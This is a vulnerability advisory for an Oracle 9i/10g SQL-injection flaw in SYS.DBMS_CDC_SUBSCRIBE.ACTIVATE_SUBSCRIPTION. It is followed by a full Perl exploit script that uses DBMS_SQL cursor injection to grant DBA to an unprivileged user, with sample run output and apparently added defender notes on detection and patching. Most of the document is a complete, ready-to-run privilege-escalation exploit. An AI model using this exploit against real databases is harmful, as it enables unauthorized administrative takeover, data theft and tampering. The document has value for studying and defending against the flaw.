
source: https://www.securityfocus.com/bid/13236/info
Oracle database is prone to an SQL-injection vulnerability because the software fails to properly sanitize user-supplied data. The 'SUBSCRIPTION_NAME' parameter is vulnerable.
Packages that employ this parameter execute with 'SYS' user privileges. Exploiting the SQL-injection vulnerability can allow an attacker to gain 'SYS' privileges.
The attacker can exploit this issue using malformed PL/SQL statements to pass unauthorized SQL statements to the database. A successful exploit could allow the attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue was originally disclosed in the 'Oracle Critical Patch Update - April 2005' advisory. BID 13139 Oracle Multiple Vulnerabilities describes the issues covered in the Oracle advisory. There is insufficient information at this time to associate this vulnerability with an identifier from the Oracle advisory.
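#!/usr/bin/perl
#
# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privilege needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/396133
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Mon Feb 26 12:13:19 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribeV2.pl line 92.
# [-] Done!
#
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait...
# [-] Creating evil cursor...
# Cursor: 2
# [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31425: subscription does not exist
# ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN
# SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute(2)||''');
# END;
# "] at dbms_cdc_subscribeV2.pl line 122.
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# [-] Done!
#

use warnings;
use strict;
use DBI;            # the Oracle driver (DBD::Oracle) is selected by the "dbi:Oracle:" DSN below
use Getopt::Std;

# Parsed command-line options, filled by getopts() in the main script.
# Kept as a package global so the whole file can read it; 'our' replaces
# the obsolete 'use vars qw/ %opt /' declaration with identical effect.
our %opt;
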
# Print the command-line synopsis to STDOUT and terminate with status 0.
# Invoked (with no arguments) whenever option parsing fails or a required
# option is missing; it never returns to the caller.
sub usage {
    my $synopsis = <<"USAGE";

Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]

Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password

-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]

USAGE
    print $synopsis;
    exit 0;
}
# ---------------------------------------------------------------------------
# Main script.
#
# Flow: parse options -> connect as the supplied (unprivileged) account ->
# either REVOKE DBA (-r, a plain statement that the sample run above shows
# failing with ORA-01031 when the account is not a DBA) or GRANT DBA (-g)
# through the DBMS_SQL cursor / ACTIVATE_SUBSCRIPTION injection described in
# the advisory text above.
#
# Defender notes:
#   - The password travels on the command line (-p), so it is exposed in the
#     process list and shell history of the host running this script.
#   - Database-side indicators: a non-administrative session that parses a
#     DBMS_SQL cursor whose text contains GRANT DBA, immediately followed by
#     a call to SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION with a
#     quote-terminated argument (it raises ORA-31425 in the sample run); and
#     GRANT DBA / REVOKE DBA statements issued by accounts that should not
#     hold that privilege. Auditing GRANT/REVOKE and DBMS_SQL usage surfaces
#     both.
#   - Remediation is the Oracle Critical Patch Update named in the
#     description above.
# ---------------------------------------------------------------------------

# -h host, -s SID, -u user, -p password (all take a value); -g grant,
# -r revoke (flags); -P port (optional value).
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;    # usage() exits; it never returns
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
# Upper-cased so it matches the unquoted Oracle identifier ("BUNKER" for
# user "bunker" in the sample run above).
my $user = uc $opt{u};

# Connect with the supplied credentials; the port is only added to the DSN
# when -P was given. A bare 'die' here reports only "Died at ... line N",
# not $DBI::errstr.
my $dbh = undef;
if ($opt{P}) {
    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}

# Statement that the injected cursor will run when -g is chosen.
my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
# Enable DBMS_OUTPUT capture on this session; the cursor number printed by
# DBMS_OUTPUT.PUT_LINE below is read back through 'dbms_output_get'.
$dbh->func( 1000000, 'dbms_output_enable' );

# -r: plain REVOKE, no bypass involved. Only succeeds if the account already
# holds the privilege to revoke DBA (see the ORA-01031 sample run above).
if ($opt{r}) {
    print "[-] Revoking DBA from $user...\n";
    $sqlcmd = "REVOKE DBA FROM $user";
    $dbh->do( $sqlcmd );
    print "[-] Done!\n";
    $dbh->disconnect;
    exit;
}

# -g, step 1: open a DBMS_SQL cursor in this session and PARSE (not execute)
# an anonymous block that runs $sqlcmd as an autonomous transaction and
# commits. The cursor number is echoed via DBMS_OUTPUT so the script can
# reference it in step 2.
print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
# Drain the DBMS_OUTPUT buffer, echoing each line, and pick the cursor
# number out of the "Cursor: N" line (a single digit, as the pattern is
# written).
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) {
    print "$line\n";
    if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;

# -g, step 2: the injection. The subscription-name argument is closed with a
# quote and concatenated with dbms_sql.execute($cursor), so the cursor parsed
# in step 1 executes with the package's SYS privileges (see the description
# above). ACTIVATE_SUBSCRIPTION itself then fails with ORA-31425, which the
# script ignores.
print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
BEGIN
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute($cursor)||''');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;